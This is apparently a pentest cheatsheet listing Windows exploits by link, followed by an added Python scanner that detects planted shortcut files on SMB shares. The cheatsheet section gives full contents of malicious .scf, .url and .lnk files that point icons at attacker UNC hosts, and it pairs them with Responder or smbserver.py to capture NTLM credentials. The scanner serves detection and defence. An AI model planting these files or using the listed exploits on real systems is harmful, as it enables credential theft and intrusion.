- CloudMe 1.11.2 BOF-RCE PoC: https://www.exploit-db.com/exploits/48389 (may require port forwarding)
- Microsoft x86 (MS11-046) https://vk9-sec.com/microsoft-windows-x86-afd-sys-local-privilege-escalation-ms11-046-2011-1249/
- If SMB shares are manually being checked, create a malicious .scf, .lnk, or .url
  - .lnk: `LFP[sP[sP[s54\\\\\192.168.49.100\x\lnk_794.ico\\\\192.168.49.100\\x\\lnk_794.ico\\\\192.168.49.100\\x\\lnk_794.ico`
  - .url:

```
[InternetShortcut]
URL=http://192.168.49.100/x/url_18.html
IconIndex=1
IconFile=\\192.168.49.100\x\url_83.ico
```

  - .scf:

```
[Shell]
Command=2
IconFile=\\10.10.16.2\share\test.ico
[Taskbar]
Command=ToggleDesktop
```

  - Then set up `responder` or `smbserver.py`
- CVE-2021-34527, PrintNightmare https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
- SMB MS08-067 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
  - https://www.exploit-db.com/exploits/7132
- Rejetto HTTP File Server RCE https://www.exploit-db.com/exploits/39161 (requires you to set up a python server serving netcat, plus a listener)
- Umbraco CMS Authenticated RCE https://www.exploit-db.com/exploits/46153
- NSClient++ 0.5.2.35 LFI https://www.exploit-db.com/exploits/46802
- Achat 0.15 https://www.exploit-db.com/exploits/36025
- Azure AD Connect: https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1
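The defender-side check for the planted .scf/.url/.lnk files above, as an added example that is not part of this cheatsheet: a Python scanner that walks a share and reports shortcut files whose icon resolves to a UNC path on a host you don't own, which is the thing Responder or smbserver.py is waiting for. The sample share is constructed in a temp directory; the `.lnk` handling is a byte search for an embedded UNC string (ANSI as in LinkInfo, UTF-16LE as in StringData) rather than a full Shell Link parser, and `trusted_hosts` is an assumed allow-list of your own file servers.

```python
"""Find .scf/.url/.lnk files in a share whose icon points at a UNC path.

Added example, not from the cheatsheet. Sample files are constructed in a temp dir.
"""
import os
import re
import tempfile

# IconFile=\\host\share\x.ico lines in the INI-style .url and .scf formats
ICONFILE_RE = re.compile(r"^\s*IconFile\s*=\s*(\\\\[^\r\n]+)", re.IGNORECASE | re.MULTILINE)
# UNC strings embedded in a binary .lnk: ANSI (LinkInfo) and UTF-16LE (StringData)
UNC_BYTES_RE = re.compile(rb"\\\\[A-Za-z0-9._-]+\\[^\x00\r\n]{1,200}")
UNC_TEXT_RE = re.compile(r"\\\\[A-Za-z0-9._-]+\\[^\x00\r\n]{1,200}")


def unc_host(unc_path):
    """'\\\\10.10.16.2\\share\\test.ico' -> '10.10.16.2'"""
    return unc_path.lstrip("\\").split("\\", 1)[0]


def lnk_unc_targets(data):
    """All UNC paths found in raw .lnk bytes, checking both string encodings."""
    found = [m.group(0).decode("latin-1") for m in UNC_BYTES_RE.finditer(data)]
    for offset in (0, 1):  # a UTF-16LE string may start on either byte alignment
        text = data[offset:].decode("utf-16-le", errors="ignore")
        found.extend(m.group(0) for m in UNC_TEXT_RE.finditer(text))
    return found


def inspect_file(path, trusted_hosts=()):
    """Finding dict if the file pulls its icon from an untrusted UNC host, else None."""
    ext = os.path.splitext(path)[1].lower()
    if ext in (".url", ".scf"):
        with open(path, "r", errors="replace") as fh:
            m = ICONFILE_RE.search(fh.read())
        targets = [m.group(1).strip()] if m else []
    elif ext == ".lnk":
        with open(path, "rb") as fh:
            targets = lnk_unc_targets(fh.read())
    else:
        return None
    trusted = {h.lower() for h in trusted_hosts}  # assumed allow-list of your own file servers
    for target in targets:
        host = unc_host(target)
        if host.lower() not in trusted:
            return {"path": path, "type": ext, "icon_target": target, "host": host}
    return None


def scan_share(root, trusted_hosts=()):
    """Walk a share and return findings sorted by path."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            finding = inspect_file(os.path.join(dirpath, name), trusted_hosts)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: f["path"])


def build_sample_share():
    """Constructed sample share: a planted .scf and .url, a benign .url, and a
    stand-in .lnk that only carries the embedded UTF-16LE UNC string (not a real Shell Link)."""
    root = tempfile.mkdtemp(prefix="share_")
    text_files = {
        "report.scf": "[Shell]\nCommand=2\nIconFile=\\\\10.10.16.2\\share\\test.ico\n[Taskbar]\nCommand=ToggleDesktop\n",
        "intranet.url": "[InternetShortcut]\nURL=http://intranet.local/\nIconIndex=1\nIconFile=\\\\192.168.49.100\\x\\url_83.ico\n",
        "docs.url": "[InternetShortcut]\nURL=http://docs.local/\nIconFile=C:\\Windows\\System32\\shell32.dll\n",
    }
    for name, body in text_files.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    with open(os.path.join(root, "policy.lnk"), "wb") as fh:
        fh.write(b"L\x00\x00\x00\x01\x14\x02\x00"
                 + "\\\\192.168.49.100\\x\\lnk_794.ico".encode("utf-16-le") + b"\x00\x00")
    return root


if __name__ == "__main__":
    for f in scan_share(build_sample_share()):
        print("%s (%s) loads its icon from %s" % (f["path"], f["type"], f["host"]))
```

Run it against the root of a writable share; anything it reports that points outside your own file servers is either a misconfigured shortcut or a planted one, and the host it names is where the NTLM authentication would have gone. The `.scf` case matters most because Explorer fetches that icon on directory listing, with no click required.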